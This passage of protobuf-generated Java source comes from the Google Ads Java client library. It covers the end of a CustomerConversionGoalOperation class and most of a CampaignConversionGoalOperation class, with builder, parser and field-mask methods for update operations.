2;</code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000001); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000001; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.CustomerConversionGoal, com.google.ads.googleads.v20.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v20.resources.CustomerConversionGoalOrBuilder> updateBuilder_; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v20.resources.CustomerConversionGoal getUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance(); } else { if (operationCase_ == 1) { return updateBuilder_.getMessage(); } return com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ public Builder setUpdate(com.google.ads.googleads.v20.resources.CustomerConversionGoal value) { if (updateBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { updateBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ public Builder setUpdate( com.google.ads.googleads.v20.resources.CustomerConversionGoal.Builder builderForValue) { if (updateBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { updateBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ public Builder mergeUpdate(com.google.ads.googleads.v20.resources.CustomerConversionGoal value) { if (updateBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance()) { operation_ = com.google.ads.googleads.v20.resources.CustomerConversionGoal.newBuilder((com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { updateBuilder_.mergeFrom(value); } else { updateBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ public Builder clearUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } updateBuilder_.clear(); } return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ public com.google.ads.googleads.v20.resources.CustomerConversionGoal.Builder getUpdateBuilder() { return getUpdateFieldBuilder().getBuilder(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.CustomerConversionGoalOrBuilder getUpdateOrBuilder() { if ((operationCase_ == 1) && (updateBuilder_ != null)) { return updateBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.CustomerConversionGoal, com.google.ads.googleads.v20.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v20.resources.CustomerConversionGoalOrBuilder> getUpdateFieldBuilder() { if (updateBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance(); } updateBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.CustomerConversionGoal, com.google.ads.googleads.v20.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v20.resources.CustomerConversionGoalOrBuilder>( (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return updateBuilder_; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v20.services.CustomerConversionGoalOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v20.services.CustomerConversionGoalOperation) private static final com.google.ads.googleads.v20.services.CustomerConversionGoalOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v20.services.CustomerConversionGoalOperation(); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CustomerConversionGoalOperation> PARSER = new com.google.protobuf.AbstractParser<CustomerConversionGoalOperation>() { @java.lang.Override public CustomerConversionGoalOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CustomerConversionGoalOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CustomerConversionGoalOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v20.services.CustomerConversionGoalOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,941
google-ads-stubs-v21/src/main/java/com/google/ads/googleads/v21/services/CampaignConversionGoalOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v21/services/campaign_conversion_goal_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v21.services; /** * <pre> * A single operation (update) on a campaign conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v21.services.CampaignConversionGoalOperation} */ public final class CampaignConversionGoalOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v21.services.CampaignConversionGoalOperation) CampaignConversionGoalOperationOrBuilder { private static final long serialVersionUID = 0L; // Use CampaignConversionGoalOperation.newBuilder() to construct. private CampaignConversionGoalOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CampaignConversionGoalOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CampaignConversionGoalOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CampaignConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.class, com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.Builder.class); } private int bitField0_; private int operationCase_ = 0; @SuppressWarnings("serial") private java.lang.Object operation_; public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { UPDATE(1), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return UPDATE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } public static final int UPDATE_FIELD_NUMBER = 1; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v21.resources.CampaignConversionGoal getUpdate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v21.resources.CampaignConversionGoalOrBuilder getUpdateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance(); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v21.services.CampaignConversionGoalOperation)) { return super.equals(obj); } com.google.ads.googleads.v21.services.CampaignConversionGoalOperation other = (com.google.ads.googleads.v21.services.CampaignConversionGoalOperation) obj; if (hasUpdateMask() != other.hasUpdateMask()) return false; if (hasUpdateMask()) { if (!getUpdateMask() .equals(other.getUpdateMask())) return false; } if (!getOperationCase().equals(other.getOperationCase())) return false; switch (operationCase_) { case 1: if (!getUpdate() .equals(other.getUpdate())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } switch (operationCase_) { case 1: hash = (37 * hash) + UPDATE_FIELD_NUMBER; hash = (53 * hash) + getUpdate().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v21.services.CampaignConversionGoalOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (update) on a campaign conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v21.services.CampaignConversionGoalOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v21.services.CampaignConversionGoalOperation) com.google.ads.googleads.v21.services.CampaignConversionGoalOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CampaignConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.class, com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.Builder.class); } // Construct using com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } if (updateBuilder_ != null) { updateBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v21.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v21.services.CampaignConversionGoalOperation getDefaultInstanceForType() { return com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v21.services.CampaignConversionGoalOperation build() { com.google.ads.googleads.v21.services.CampaignConversionGoalOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v21.services.CampaignConversionGoalOperation buildPartial() { com.google.ads.googleads.v21.services.CampaignConversionGoalOperation result = new com.google.ads.googleads.v21.services.CampaignConversionGoalOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v21.services.CampaignConversionGoalOperation result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v21.services.CampaignConversionGoalOperation result) { result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && updateBuilder_ != null) { result.operation_ = updateBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v21.services.CampaignConversionGoalOperation) { return mergeFrom((com.google.ads.googleads.v21.services.CampaignConversionGoalOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v21.services.CampaignConversionGoalOperation other) { if (other == com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.getDefaultInstance()) return this; if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } switch (other.getOperationCase()) { case UPDATE: { mergeUpdate(other.getUpdate()); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getUpdateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { input.readMessage( getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask( com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000001); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000001; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.CampaignConversionGoal, com.google.ads.googleads.v21.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v21.resources.CampaignConversionGoalOrBuilder> updateBuilder_; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v21.resources.CampaignConversionGoal getUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance(); } else { if (operationCase_ == 1) { return updateBuilder_.getMessage(); } return com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code> */ public Builder setUpdate(com.google.ads.googleads.v21.resources.CampaignConversionGoal value) { if (updateBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { updateBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code> */ public Builder setUpdate( com.google.ads.googleads.v21.resources.CampaignConversionGoal.Builder builderForValue) { if (updateBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { updateBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have 